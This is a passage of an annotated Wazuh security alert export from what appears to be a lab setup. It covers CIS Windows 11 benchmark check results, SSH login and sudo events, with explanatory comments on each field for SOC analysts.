data.sca.check.title:  Ensure 'Audit Authentication Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authentication Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:42.406+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:42.406+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534682.2371559
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type – check (one individual test) or summary (roll‑up of the whole scan). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26163
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Authorization Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authorization policy. Events for this subcategory include:
- 4704: A user right was assigned.
- 4705: A user right was removed.
- 4706: A new trust was created to a domain.
- 4707: A trust to a domain was removed.
- 4714: Encrypted data recovery policy was changed.
The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.3
CIS benchmark control number this single check implements – same value as rule.cis on this alert.

data.sca.check.compliance.cis_csc:  8.5
CIS Critical Security Controls mapping for this check.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authorization Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
passed, failed or not applicable (could not be evaluated). Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:44.567+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:44.567+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
GPG13 mapping – UK Good Practice Guide 13 protective‑monitoring controls.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534684.2374351
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:44.558262+00:00 server1 sshd[3469]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:44.558262+00:00
Timestamp parsed out of the raw log line – compare with timestamp above to spot ingest lag.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  simba(uid=1000)
Account the session was opened for, as parsed from the log – here with its numeric UID attached.

data.uid:  0
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

sshd: authentication success.

🧠 What happened? sshd: authentication success.

🔍 Why it's important: Moderate‑risk ATT&CK technique

🕒 2025-04-24T22:44:44.567+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement'] – ['Valid Accounts', 'Remote Services'] [T1078] [T1021]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

[Medium] T1021 – Remote Services

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:44.567+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  sshd: authentication success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5715
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078', 'T1021']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access', 'Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts', 'Remote Services']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sshd', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
GPG13 mapping – UK Good Practice Guide 13 protective‑monitoring controls.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534684.2374810
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:44:44.552511+00:00 server1 sshd[3469]: Accepted password for simba from 192.168.6.135 port 57242 ssh2
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:44:44.552511+00:00
Timestamp parsed out of the raw log line – compare with timestamp above to spot ingest lag.

decoder.parent:  sshd
Parent decoder used – for nested parsing.

decoder.name:  sshd
Name of the Wazuh decoder that parsed this raw log.

data.srcip:  192.168.6.135
Source IP address of the connection as parsed from the log – check it against known admin hosts before closing the alert.

data.srcport:  57242
Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.

data.dstuser:  simba
Target account the authentication was for.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Moderate‑risk ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:44.707+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:44.707+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  9
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.: Status changed from 'not applicable' to failed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19014
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
CIS Critical Security Controls (CIS CSC) mapping – the control family this rule supports.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534684.2375277
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type – check (one individual test) or summary (roll‑up of the whole scan). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26164
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include:
- 4944: The following policy was active when the Windows Firewall started.
- 4945: A rule was listed when the Windows Firewall started.
- 4946: A change has been made to Windows Firewall exception list. A rule was added.
- 4947: A change has been made to Windows Firewall exception list. A rule was modified.
- 4948: A change has been made to Windows Firewall exception list. A rule was deleted.
- 4949: Windows Firewall settings were restored to the default values.
- 4950: A Windows Firewall setting has changed.
- 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall.
- 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced.
- 4953: A rule has been ignored by Windows Firewall because it could not parse the rule.
- 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied.
- 4956: Windows Firewall has changed the active profile.
- 4957: Windows Firewall did not apply the following rule.
- 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer.
The recommended state for this setting is: Success and Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.4
CIS benchmark control number this single check implements – same value as rule.cis on this alert.

data.sca.check.compliance.cis_csc:  8.5
CIS Critical Security Controls mapping for this check.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
passed, failed or not applicable (could not be evaluated). Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🧠 What happened? SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:54.761+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:54.761+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19004
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534694.2380503
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  summary
Event type – check (one individual test) or summary (roll‑up of the whole scan). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.description:  This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11.
Free‑text description of the benchmark policy that produced this summary.

data.sca.policy_id:  cis_win11_enterprise_21H2
Internal identifier for that policy – a string, not a number; use it to filter summaries for the same benchmark across agents.

data.sca.passed:  126
Checks that were green – a quick confidence boost.

data.sca.failed:  260
Number of failed checks in the scan. Lots of red means poor hygiene.

data.sca.invalid:  9
Checks that couldn’t run (permissions, missing file, etc.).

data.sca.total_checks:  395
Total tests executed this run.

data.sca.score:  32
Overall compliance score 0‑100%. Under 85% usually needs remediation.

data.sca.file:  cis_win11_enterprise.yml
YAML policy file the SCA module loaded for this scan – the check definitions live here.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:54.894+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:54.894+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.5']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
CIS Critical Security Controls (CIS CSC) mapping – the control family this rule supports.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534694.2381818
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type – check (one individual test) or summary (roll‑up of the whole scan). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26004
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Password must meet complexity requirements' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting checks all new passwords to ensure that they meet basic requirements for strong passwords. When this policy is enabled, passwords must meet the following minimum requirements:
- Not contain the user's account name or parts of the user's full name that exceed two consecutive characters
- Be at least six characters in length
- Contain characters from three of the following categories:
  - English uppercase characters (A through Z)
  - English lowercase characters (a through z)
  - Base 10 digits (0 through 9)
  - Non-alphabetic characters (for example, !, $, #, %)
  - A catch-all category of any Unicode character that does not fall under the previous four categories. This fifth category can be regionally specific.
Each additional character in a password increases its complexity exponentially. For instance, a seven-character, all lower-case alphabetic password would have 26^7 (approximately 8 x 10^9, or 8 billion) possible combinations. At 1,000,000 attempts per second (a capability of many password-cracking utilities), it would only take 133 minutes to crack. A seven-character alphabetic password with case sensitivity has 52^7 combinations. A seven-character case-sensitive alphanumeric password without punctuation has 62^7 combinations. An eight-character password has 26^8 (or 2 x 10^11) possible combinations. Although this might seem to be a large number, at 1,000,000 attempts per second it would take only 59 hours to try all possible passwords. Remember, these times will significantly increase for passwords that use ALT characters and other special keyboard characters such as '!' or '@'. Proper use of the password settings can help make it difficult to mount a brute force attack. The recommended state for this setting is: Enabled.
Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Passwords that contain only alphanumeric characters are extremely easy to discover with several publicly available tools.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Password must meet complexity requirements
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.5
CIS benchmark control number this single check implements – same value as rule.cis on this alert.

data.sca.check.compliance.cis_csc:  5.2
CIS Critical Security Controls mapping for this check.

data.sca.check.command:  ['powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
passed, failed or not applicable (could not be evaluated). Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser'
Why the check could not be evaluated – here the command hit the SCA module's timeout, so 'not applicable' does not mean the setting is compliant; the previous run had it failed.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Successful sudo to ROOT executed.

🧠 What happened? Successful sudo to ROOT executed.

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:45:14.601+0000 | 🧠 MITRE: ['Privilege Escalation', 'Defense Evasion'] – ['Sudo and Sudo Caching'] [T1548.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1548.003 – Sudo and Sudo Caching

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:14.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Successful sudo to ROOT executed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5402
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1548.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Privilege Escalation', 'Defense Evasion']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Sudo and Sudo Caching']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sudo']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5', '10.2.2']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.6', '7.8', '7.13']
GPG13 mapping – UK Good Practice Guide 13 protective‑monitoring controls.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7', 'AC.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534714.2389057
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:45:13.791511+00:00 server1 sudo: simba : TTY=pts/0 ; PWD=/home/simba ; USER=root ; COMMAND=/usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sudo
